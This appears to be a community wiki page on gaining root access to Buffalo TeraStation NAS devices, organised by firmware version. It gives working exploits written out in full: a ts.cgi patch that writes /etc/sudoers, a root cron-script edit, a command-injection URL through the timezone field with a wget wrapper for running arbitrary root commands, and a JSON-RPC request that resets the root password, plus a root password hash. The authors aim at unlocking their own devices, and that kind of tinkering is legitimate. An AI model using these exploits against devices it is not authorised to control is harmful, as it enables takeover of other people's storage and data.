Terastation Become root

As each release of the firmware fixes some bugs, new ways to become root must be discovered.

for 1.03 you can log in as admin, then replace /etc/passwd.
/etc is world writable, which allows us to install a customized passwd file with a known password for root.

cd /etc mv passwd passwd-good cp passwd-good passwd vi passwd (once in vi, copy the hashed password value from the admin account into root's) exit vi (:q) su (use whatever password you assigned to admin, now also for root)

chown root:root /etc/passwd (if you want to keep things tidy)

su didn't seem to like an empty root password, so that's why we copy admin's. The hack described in Become_root_(2.04) may work as well, dunno, didn't see it until after I'd done the above.

- SteveK

for 1.04 you can hack /www/cgi-bin/ts.cgi
Once you added a Terastation Serial console you can login as admin and start to explore the [http:/ls-lR/1.04/ file system] but you are not root, yet.

There are no suid-root binaries and root comes with a password: $1$GhRqUjJ1$RPYGfyN1e4002OQ7BRkW20. You could now use a password cracker to get the cleartext password, but there must be a simpler way.

Did you already find it while browsing the [http:/ls-lR/1.04/ file system]?

No? [http:/ls-lR/1.04/_www_cgi-bin.html Look here.]

ts.cgi is the binary that generates web interface. It's quite well written, and filters all input. Hacking the terastation from the web interface looks too complicated as well.

But we are looking at the file on disk, it is world writable!

This small patch:

--- ts.cgi     Mon Apr  4 14:24:03 2005 +++ ts.cgi     Fri Apr 29 10:06:49 2005 @@ -35,6 +35,13 @@ #### QUERY_STRING�?�指定�?�るページを表示�?�る ### ### TOP ### +if ($query{'page'} eq "hack") { +   open F, ">/etc/sudoers"; +   print F "admin  ALL = (ALL) ALL\n"; +   close F; +    chmod 0440, "/etc/sudoers"; +   $query{'page'} = "top"; +} if ($query{'page'} eq "top") { require "./html/$lang/head.pl"; require "./html/$lang/body.pl";

allows you to request a "hack" page: http://myterastation.local/cgi-bin/ts.cgi?page=hack and a sudoers file will be written, you will be redirected to the default "top" page.

Now you can use sudo to become r00t:

BUFFALO INC. TeraStation series HD-HTGL (YOSHIMUNE) HD-HTGL113 login: admin Password: admin@HD-HTGL113:~$ id uid=1000(admin) gid=100(hdusers) groups=100(hdusers) admin@HD-HTGL113:~$ sudo -s We trust you have received the usual lecture from the local System Administrator. It usually boils down to these two things: #1) Respect the privacy of others.        #2) Think before you type. Password: root@HD-HTGL113:~# id uid=0(root) gid=0(root) groups=0(root) root@HD-HTGL113:~#

have fun.

for 2.04 you can hack /etc/cron.d/progchk
Firmware version 2.04 fixes the modes on the /www/cgi-bin directory, fortunately there are two more world writable files on the filesystem which you can take advantage of.

The easiest approach will be to edit /etc/cron.d/progchk. This shell script is run every minute as root! Just add a couple lines to make it create an /etc/sudoers file as in the 1.04 description and give it the right modes.

!/bin/sh # # echo "admin ALL = (ALL) ALL" > /etc/sudoers chmod 440 /etc/sudoers ls_servd {
 * 1) progchk
 * 2) The existence of the program is checked in every minute.

After a minute has passed you'll be able to use sudo to become root. You should probably remove the added lines from progchk, but they won't hurt anything where they are.

for 2.14 you can still hack /www/cgi-bin/ts.cgi</tt>
During a long series of mods in which I set up opensshd and disabled telnet access, somehow I lost my ability to log in and couldn't be bothered to reflash and redo all my mods, so I had some fun and found this hack instead :-)

Most of the CGI parameters in the web interface are carefully sanity-checked. But there are still loads of system calls with the highly dangerous single parameter version! Obviously the authors never heard of Perl's taint mode. After a bit of looking, I found that the  parameter for http://terastation/ts.cgi?page=basic&mode=setup was unchecked, and ends up getting passed directly to this code:

system("/usr/local/bin/set_timezone.sh $zone");

Oops! So it only remains to craft the right URL and we can run any commands we want on the server as root :-) I wrote a simple Perl script to help do this. Example usage:

$ ./tera-cgi-hack.pl echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd">>/etc/inetd.conf ^D http://192.168.11.150/cgi-bin/ts.cgi?hiddenNTPServer=&mode=setup&page=basic&rdoFTP=on&rdoNTP=off&rdoNetatalk=on&txtCodepage=ISO8859_1&txtDay=1&txtHostComment=TeraStation&txtHostName=HD-HTGLD03&txtHour=16&txtLanguage=english&txtMin=7&txtMonth=7&txtNTPServer=&txtSec=37&txtTimeZone=0%3Becho%20%22telnet%20stream%20tcp%20nowait%20root%20%2Fusr%2Fsbin%2Ftcpd%20in.telnetd%22%3E%3E%2Fetc%2Finetd.conf&txtYear=2007

Log on as admin, then paste this URL into your browser, and it will run the command to enable telnet. No reflashing required :-)

You can go one step further and automate the whole process via wget, sanitizing the output with Perl:

$ ADMIN_PASSWORD=change-me $ HACK_SCRIPT=./tera-cgi-hack.pl

$ run_as_root { echo "echo MAGIC_START;$*;echo MAGIC_END" | $HACK_SCRIPT > /tmp/url wget --http-user=admin --http-passwd=$ADMIN_PASSWORD -O- -q $(</tmp/url) | \ perl -0777pe "s/.*MAGIC_START\n//s;s/MAGIC_END.*//s" }

e.g.

$ run_as_root cat /proc/cpuinfo cpu            : 82xx revision       : 16.20 (pvr 8081 1014) bogomips       : 173.26 vendor         : Motorola SPS machine        : Sandpoint

$ run_as_root uname -a Linux HD-HTGLD03 2.4.20_mvl31-ppc_terastation #1 Fri, 01 Dec 2006 10:57:27 +0900 ppc unknown

Almost as good as a real shell ;-)

--Aspiers 18:10, 1 July 2007 (CEST)

Epilogue

I did find what hosed my telnetd and sshd in the end - details are here.

for 2.46 you can set the root password with a HTTP Request
You can set the root password via the web interface by manipulating the http request for updating users. If you change the uid to 0 you will be able to update the root user password - see example below.

I haven't tested this 100% but this changes the password for the root account in the sqlite database (/etc/melco/nas.sqlite3) that seems to be used to create the config files. As such the change to the root password should persist across firmware updates.

Process for firefox

 * 1) Login the the terastation as admin
 * 2) Navigate to the users section
 * 3) Open the edit user settings window for any user (warning you are about to change a user password)
 * 4) Enter a new password but do not hit OK yet
 * 5) Open up the dev tools and open the network tab
 * 6) * Default short cut Ctrl+Shift+Q
 * 7) Press OK on the user settings window
 * 8) Find the /nasapi/ message in the network tab where method = "User.edit" in the Params section (see example)
 * 9) Right click this request and select "Edit and Resend"
 * 10) Modify the Request Body
 * 11) * Replace the value of uid with 0
 * 12) * Replace the value of group_id with 0
 * 13) * Replace the value of sub_groups_ids with [0]
 * 14) Hit the send button
 * 15) * If all goes well you should get a 200 response with some json content.
 * 16) Create a new user (you can delete it after)
 * 17) * It didn't work for me until i did this - seems to flush the changes in /etc/melco/nas.sqlite3 to the /etc/shadow file

Example Request
Method: POST

HTTP Headers

Content-Type: application/json

Request Body { "jsonrpc":"2.0", "method":"User.edit", "params":{ "uid":0, "mail":"", "password":"-- REPLACE ME --", "description":"", "use_quota":0, "group_id":0, "sub_group_ids":[0], "sid":"-- REPLACE ME --" }, "id":"-- REPLACE ME --" }

on some releases you can simply log in as root</tt>
N.B. These methods do NOT give you the root password. They let you execute commands as root without relying on telnetd or sshd being enabled. Of course, once you can do this you can run passwd or replace /etc/passwd to replace the root password with one you know. At this point you also need to enable telnetd or sshd or some other more convenient way of logging in as root.

telnet-enabled releases: try myroot</tt>
Being a newbie and all, it took me a few hours to attempt previously listed methods, all to NO GOOD USE. But I noticed the /etc/passwd</tt> file still rules in there. First of all, use your regular admin</tt> account and known password. Then vi</tt> the passwd file - opens as RO!

BUFFALO INC. TeraStation series HD-HTGL (YOSHIMUNE) NAS3 login: admin Password: admin@NAS:~# vi /etc/passwd</tt>

If yout see the myroot</tt> account listed there, you're all set...

nobody:*:99:99:nobody:/home:/bin/sh admin:$1$iO8/IO5h$CL3VF6vB3W3STxlbDRuf0/:1000:100::/home:/bin/sh guest::1001:100::/home:/bin/sh myroot:$1$mbPhv2uU$tdNYMFUYwn1WyzPYtT9Qb/:0:0:root:/root:/bin/bash</tt>

Log in again with myroot</tt> and blank/NO password. Then proceed to replace the root password with your own:

myroot@NAS:~# passwd root Enter new UNIX password: Retype new UNIX password:</tt>

You may want to change myroot password as well - don´t leave it just blank!

myroot@NAS:~# passwd Enter new UNIX password: Retype new UNIX password:</tt>

LISTO! Now you're ready to start hacking your TeraStation OS.